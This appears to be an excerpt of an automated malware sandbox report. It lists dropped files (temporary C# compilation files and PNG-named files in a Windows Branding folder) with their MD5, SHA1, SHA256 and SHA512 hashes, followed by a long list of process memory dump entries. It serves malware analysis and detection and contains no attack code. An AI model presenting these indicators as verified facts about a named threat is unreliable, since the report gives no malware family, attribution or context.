\??\c:\Users\Admin\AppData\Local\Temp\j34tpabi\CSCEB51A9D4AFF540DABFBC18CA516ABF70.TMP
MD5 5d1fa1aa38a6ec117269c909fc221ed9
SHA1 61912a43992c88acbebc8a572c115d4925feacae
SHA256 afedbec9985657fd7dd915f335652fb9765bdc9f0c5f60eca30f66388050ed1a
SHA512 ccba5a2b64ac0bebf6b22a1d7de715da2e7f11e79df7dbde2daebe67f65adaf415cd8ef057470b81b5a86507522ac2c49a7c283cab73ed8f0a894d7c09c5a199
-
\??\c:\Users\Admin\AppData\Local\Temp\j34tpabi\j34tpabi.0.cs
MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\j34tpabi\j34tpabi.cmdline
MD5 5c55dae8096b87631eff4dfc31936ee7
SHA1 3f48b2a5db45b88d44bf47a18383b820bbda3507
SHA256 1d2b7e5f43832ce64c41ea968319cee68f7215f6fa4bdf87565363ee19d4e48c
SHA512 5774a5883937abba08e77489b1412cb8192d0c1248a2bb97dc1bcf26d17362983b9cb649401a15e96570308fb441b19c50929cd088196a5027ea55fa11b1a830
-
\Windows\Branding\mediasrv.png
MD5 817b407a7b13f1e8010f65685a3a953f
SHA1 43c5d8a426864a893540ff93efa0ce9a54059981
SHA256 c168afed57a9b2960b58ff8a99afabcac9eaf4c341cf489f412d27d9a4494e54
SHA512 6c1b1737f629cb842444a018b3f3828147a4d986136c37020a44f39de450721325c82396618318481aeca90f30c36ee2789b8a3facf59ecc2afcff30091f0805
-
\Windows\Branding\mediasvc.png
MD5 c9e06976020650f39385fdb2d73b009c
SHA1 81c894055ca5d4efd62d97087598e8cb23bcda36
SHA256 741cd5c361878f530e5641891a34089375b53d7f52eebb98e7ed9195bb5b1a72
SHA512 b8e50d313d249c8f633003277b90a4edfaa20157881c22edaa6ca6aa181a450be2722cae9ff2a27cde5b718f14f07104fdb4ca067afbe0ee809cb308b9dd617b
-
Memory dumps (one per line; the size in parentheses is the reported Filesize for region dumps, mapping dumps carry no size):

memory/356-407-0x0000000000000000-mapping.dmp
memory/476-509-0x0000000000000000-mapping.dmp
memory/492-166-0x0000000000000000-mapping.dmp
memory/504-223-0x0000000000000000-mapping.dmp
memory/504-611-0x00000000003C0000-0x00000000003C7000-memory.dmp (28KB)
memory/504-612-0x00000000003B0000-0x00000000003BD000-memory.dmp (52KB)
memory/612-401-0x0000000000000000-mapping.dmp
memory/736-209-0x0000000000000000-mapping.dmp
memory/760-537-0x0000000003100000-0x0000000003175000-memory.dmp (468KB)
memory/760-538-0x0000000003090000-0x00000000030FB000-memory.dmp (428KB)
memory/764-402-0x0000000000000000-mapping.dmp
memory/764-217-0x0000000000000000-mapping.dmp
memory/788-408-0x0000000000000000-mapping.dmp
memory/820-176-0x0000000000000000-mapping.dmp
memory/820-545-0x0000000000310000-0x0000000000317000-memory.dmp (28KB)
memory/820-225-0x0000000000000000-mapping.dmp
memory/820-546-0x0000000000300000-0x000000000030B000-memory.dmp (44KB)
memory/876-150-0x0000000004A43000-0x0000000004A44000-memory.dmp (4KB)
memory/876-172-0x0000000008E10000-0x0000000008E11000-memory.dmp (4KB)
memory/876-157-0x0000000008190000-0x0000000008191000-memory.dmp (4KB)
memory/876-162-0x00000000088E0000-0x00000000088E1000-memory.dmp (4KB)
memory/876-156-0x0000000007EF0000-0x0000000007EF1000-memory.dmp (4KB)
memory/876-164-0x0000000008AE0000-0x0000000008AE1000-memory.dmp (4KB)
memory/876-155-0x0000000007EA0000-0x0000000007EA1000-memory.dmp (4KB)
memory/876-154-0x0000000004A44000-0x0000000004A46000-memory.dmp (8KB)
memory/876-139-0x0000000000000000-mapping.dmp
memory/876-153-0x0000000007D50000-0x0000000007D51000-memory.dmp (4KB)
memory/876-142-0x0000000004A80000-0x0000000004AAE000-memory.dmp (184KB)
memory/876-143-0x0000000007120000-0x0000000007121000-memory.dmp (4KB)
memory/876-152-0x0000000007D20000-0x0000000007D21000-memory.dmp (4KB)
memory/876-160-0x0000000008850000-0x0000000008851000-memory.dmp (4KB)
memory/876-173-0x0000000008FE0000-0x0000000008FE1000-memory.dmp (4KB)
memory/876-151-0x0000000007690000-0x0000000007691000-memory.dmp (4KB)
memory/876-149-0x0000000004A42000-0x0000000004A43000-memory.dmp (4KB)
memory/876-148-0x0000000004A40000-0x0000000004A41000-memory.dmp (4KB)
memory/876-147-0x0000000000400000-0x0000000002B96000-memory.dmp (39.6MB)
memory/876-145-0x0000000007620000-0x000000000764C000-memory.dmp (176KB)
memory/876-144-0x0000000002CD0000-0x0000000002E1A000-memory.dmp (1.3MB)
memory/876-146-0x0000000004800000-0x0000000004839000-memory.dmp (228KB)
memory/896-610-0x00000000001C0000-0x00000000001CB000-memory.dmp (44KB)
memory/896-609-0x00000000001D0000-0x00000000001D1000-memory.dmp (4KB)
memory/896-131-0x0000000000400000-0x0000000002BEB000-memory.dmp (39.9MB)
memory/896-128-0x0000000000000000-mapping.dmp
memory/912-426-0x0000000000000000-mapping.dmp
memory/968-308-0x0000026DCC518000-0x0000026DCC51A000-memory.dmp (8KB)
memory/968-255-0x0000026DCA6F0000-0x0000026DCA6F2000-memory.dmp (8KB)
memory/968-249-0x0000026DCA6F0000-0x0000026DCA6F2000-memory.dmp (8KB)
memory/968-250-0x0000026DCA6F0000-0x0000026DCA6F2000-memory.dmp (8KB)
memory/968-251-0x0000026DCA6F0000-0x0000026DCA6F2000-memory.dmp (8KB)
memory/968-252-0x0000026DCA6F0000-0x0000026DCA6F2000-memory.dmp (8KB)
memory/968-253-0x0000026DCA6F0000-0x0000026DCA6F2000-memory.dmp (8KB)
memory/968-248-0x0000000000000000-mapping.dmp
memory/968-569-0x000001ED256C0000-0x000001ED256C1000-memory.dmp (4KB)
memory/968-285-0x0000026DCC516000-0x0000026DCC518000-memory.dmp (8KB)
memory/968-550-0x000001ED23670000-0x000001ED23671000-memory.dmp (4KB)
memory/968-256-0x0000026DCA6F0000-0x0000026DCA6F2000-memory.dmp (8KB)
memory/968-257-0x0000026DCA6F0000-0x0000026DCA6F2000-memory.dmp (8KB)
memory/968-258-0x0000026DCA6F0000-0x0000026DCA6F2000-memory.dmp (8KB)
memory/968-262-0x0000026DCA6F0000-0x0000026DCA6F2000-memory.dmp (8KB)
memory/968-260-0x0000026DCC510000-0x0000026DCC512000-memory.dmp (8KB)
memory/968-261-0x0000026DCC513000-0x0000026DCC515000-memory.dmp (8KB)
memory/1064-422-0x0000000000000000-mapping.dmp
memory/1096-392-0x0000000000000000-mapping.dmp
memory/1164-224-0x0000000000000000-mapping.dmp
memory/1164-175-0x0000000000000000-mapping.dmp
memory/1164-395-0x0000000000000000-mapping.dmp
memory/1312-186-0x000001F73D2A0000-0x000001F73D2A2000-memory.dmp (8KB)
memory/1312-182-0x000001F757570000-0x000001F75783E000-memory.dmp (2.8MB)
memory/1312-187-0x000001F73D2A3000-0x000001F73D2A5000-memory.dmp (8KB)
memory/1312-178-0x0000000000000000-mapping.dmp
memory/1312-189-0x000001F73D2A6000-0x000001F73D2A7000-memory.dmp (4KB)
memory/1312-188-0x000001F73D2A5000-0x000001F73D2A6000-memory.dmp (4KB)
memory/1316-181-0x0000000000000000-mapping.dmp
memory/1436-511-0x0000000000000000-mapping.dmp
memory/1492-170-0x0000016B2BA70000-0x0000016B2BA72000-memory.dmp (8KB)
memory/1492-171-0x0000016B2BA70000-0x0000016B2BA72000-memory.dmp (8KB)
memory/1532-414-0x0000000000000000-mapping.dmp
memory/1540-503-0x0000000000000000-mapping.dmp
memory/1540-191-0x0000000000000000-mapping.dmp
memory/1588-447-0x0000000000000000-mapping.dmp
memory/1688-137-0x0000000000400000-0x0000000002B76000-memory.dmp (39.5MB)
memory/1688-136-0x00000000001F0000-0x00000000001F9000-memory.dmp (36KB)
memory/1688-132-0x0000000000000000-mapping.dmp
memory/1688-135-0x00000000001D0000-0x00000000001D8000-memory.dmp (32KB)
memory/1728-185-0x0000000000000000-mapping.dmp
memory/1752-384-0x0000000000000000-mapping.dmp
memory/1752-167-0x0000000000000000-mapping.dmp
memory/1828-513-0x0000000000000000-mapping.dmp
memory/1844-512-0x0000000000000000-mapping.dmp
memory/1844-387-0x0000000000000000-mapping.dmp
memory/1944-549-0x0000000000BF0000-0x0000000000BFE000-memory.dmp (56KB)
memory/1944-548-0x0000000000E80000-0x0000000000E89000-memory.dmp (36KB)
memory/2032-393-0x0000000000000000-mapping.dmp
memory/2120-568-0x0000000000F10000-0x0000000000F1C000-memory.dmp (48KB)
memory/2120-567-0x0000000000F20000-0x0000000000F26000-memory.dmp (24KB)
memory/2208-406-0x0000000000000000-mapping.dmp
memory/2208-126-0x0000000004A30000-0x0000000004AC1000-memory.dmp (580KB)
memory/2208-127-0x0000000000400000-0x0000000002BEB000-memory.dmp (39.9MB)
memory/2208-122-0x0000000000000000-mapping.dmp
memory/2208-125-0x00000000047F0000-0x0000000004870000-memory.dmp (512KB)
memory/2252-540-0x0000027579A03000-0x0000027579A05000-memory.dmp (8KB)
memory/2252-547-0x0000027579A06000-0x0000027579A08000-memory.dmp (8KB)
memory/2252-539-0x0000027579A00000-0x0000027579A02000-memory.dmp (8KB)
memory/2252-566-0x0000027579A08000-0x0000027579A09000-memory.dmp (4KB)
memory/2264-159-0x0000000005900000-0x0000000005902000-memory.dmp (8KB)
memory/2264-138-0x0000000004CA0000-0x0000000004CB6000-memory.dmp (88KB)
memory/2264-121-0x0000000001250000-0x0000000001266000-memory.dmp (88KB)
memory/2264-158-0x0000000005900000-0x0000000005902000-memory.dmp (8KB)
memory/2264-161-0x00000000058F0000-0x00000000058FF000-memory.dmp (60KB)
memory/2368-119-0x0000000002CD0000-0x0000000002E1A000-memory.dmp (1.3MB)
memory/2368-120-0x0000000000400000-0x0000000002B73000-memory.dmp (39.4MB)
memory/2368-504-0x0000000000000000-mapping.dmp
memory/2368-118-0x0000000002CB0000-0x0000000002CB8000-memory.dmp (32KB)
memory/2368-216-0x0000000000000000-mapping.dmp
memory/2564-355-0x0000000000000000-mapping.dmp
memory/2596-228-0x0000000000000000-mapping.dmp
memory/2608-510-0x0000000000000000-mapping.dmp
memory/2684-372-0x0000024E3E458000-0x0000024E3E45A000-memory.dmp (8KB)
memory/2684-314-0x0000024E3E456000-0x0000024E3E458000-memory.dmp (8KB)
memory/2684-310-0x0000024E3E450000-0x0000024E3E452000-memory.dmp (8KB)
memory/2684-312-0x0000024E3E453000-0x0000024E3E455000-memory.dmp (8KB)
memory/2684-290-0x0000000000000000-mapping.dmp
memory/2764-409-0x0000000000000000-mapping.dmp
memory/2776-163-0x0000000000000000-mapping.dmp
memory/2792-381-0x0000000000000000-mapping.dmp
memory/2836-197-0x000001EB927C0000-0x000001EB927C2000-memory.dmp (8KB)
memory/2836-212-0x000001EB94486000-0x000001EB94488000-memory.dmp (8KB)
memory/2836-200-0x000001EB927C0000-0x000001EB927C2000-memory.dmp (8KB)
memory/2836-240-0x000001EBAF280000-0x000001EBAF281000-memory.dmp (4KB)
memory/2836-199-0x000001EB927C0000-0x000001EB927C2000-memory.dmp (8KB)
memory/2836-198-0x000001EB944B0000-0x000001EB944B1000-memory.dmp (4KB)
memory/2836-239-0x000001EBAEEF0000-0x000001EBAEEF1000-memory.dmp (4KB)
memory/2836-201-0x000001EB927C0000-0x000001EB927C2000-memory.dmp (8KB)
memory/2836-247-0x000001EB927C0000-0x000001EB927C2000-memory.dmp (8KB)
memory/2836-196-0x000001EB927C0000-0x000001EB927C2000-memory.dmp (8KB)
memory/2836-202-0x000001EB927C0000-0x000001EB927C2000-memory.dmp (8KB)
memory/2836-238-0x000001EB94488000-0x000001EB94489000-memory.dmp (4KB)
memory/2836-195-0x000001EB927C0000-0x000001EB927C2000-memory.dmp (8KB)
memory/2836-234-0x000001EB927C0000-0x000001EB927C2000-memory.dmp (8KB)
memory/2836-194-0x000001EB927C0000-0x000001EB927C2000-memory.dmp (8KB)
memory/2836-193-0x000001EB927C0000-0x000001EB927C2000-memory.dmp (8KB)
memory/2836-192-0x0000000000000000-mapping.dmp
memory/2836-233-0x000001EB927C0000-0x000001EB927C2000-memory.dmp (8KB)
memory/2836-203-0x000001EBAE8C0000-0x000001EBAE8C1000-memory.dmp (4KB)
memory/2836-232-0x000001EB94540000-0x000001EB94541000-memory.dmp (4KB)
memory/2836-221-0x000001EB94500000-0x000001EB94501000-memory.dmp (4KB)
memory/2836-211-0x000001EB94483000-0x000001EB94485000-memory.dmp (8KB)
memory/2836-210-0x000001EB94480000-0x000001EB94482000-memory.dmp (8KB)
memory/2836-205-0x000001EB927C0000-0x000001EB927C2000-memory.dmp (8KB)
memory/2848-168-0x0000000000000000-mapping.dmp
memory/2888-543-0x00000000004B0000-0x00000000004B7000-memory.dmp (28KB)
memory/2888-177-0x0000000000000000-mapping.dmp
memory/2888-544-0x00000000004A0000-0x00000000004AC000-memory.dmp (48KB)
memory/2976-184-0x0000000000000000-mapping.dmp
memory/3148-280-0x0000000000000000-mapping.dmp
memory/3236-169-0x0000000000000000-mapping.dmp
memory/3404-552-0x0000000003050000-0x0000000003059000-memory.dmp (36KB)
memory/3404-551-0x0000000003060000-0x0000000003065000-memory.dmp (20KB)
memory/3520-165-0x0000000000000000-mapping.dmp
memory/3588-190-0x0000000000000000-mapping.dmp
memory/3592-376-0x00000253A6996000-0x00000253A6998000-memory.dmp (8KB)
memory/3592-336-0x0000000000000000-mapping.dmp
memory/3592-373-0x00000253A6990000-0x00000253A6992000-memory.dmp (8KB)
memory/3592-394-0x00000253A6998000-0x00000253A699A000-memory.dmp (8KB)
memory/3592-374-0x00000253A6993000-0x00000253A6995000-memory.dmp (8KB)
memory/3616-607-0x0000000002AE0000-0x0000000002AE6000-memory.dmp (24KB)
memory/3616-608-0x0000000002AD0000-0x0000000002ADB000-memory.dmp (44KB)
memory/3640-213-0x0000000000000000-mapping.dmp
memory/3640-419-0x0000000000000000-mapping.dmp
memory/3768-400-0x0000000000000000-mapping.dmp
memory/3796-354-0x0000000000000000-mapping.dmp
memory/3868-508-0x0000000000000000-mapping.dmp
memory/3876-174-0x0000000000000000-mapping.dmp
memory/3940-403-0x0000000000000000-mapping.dmp
memory/3988-410-0x0000000000000000-mapping.dmp
memory/4076-380-0x0000000000000000-mapping.dmp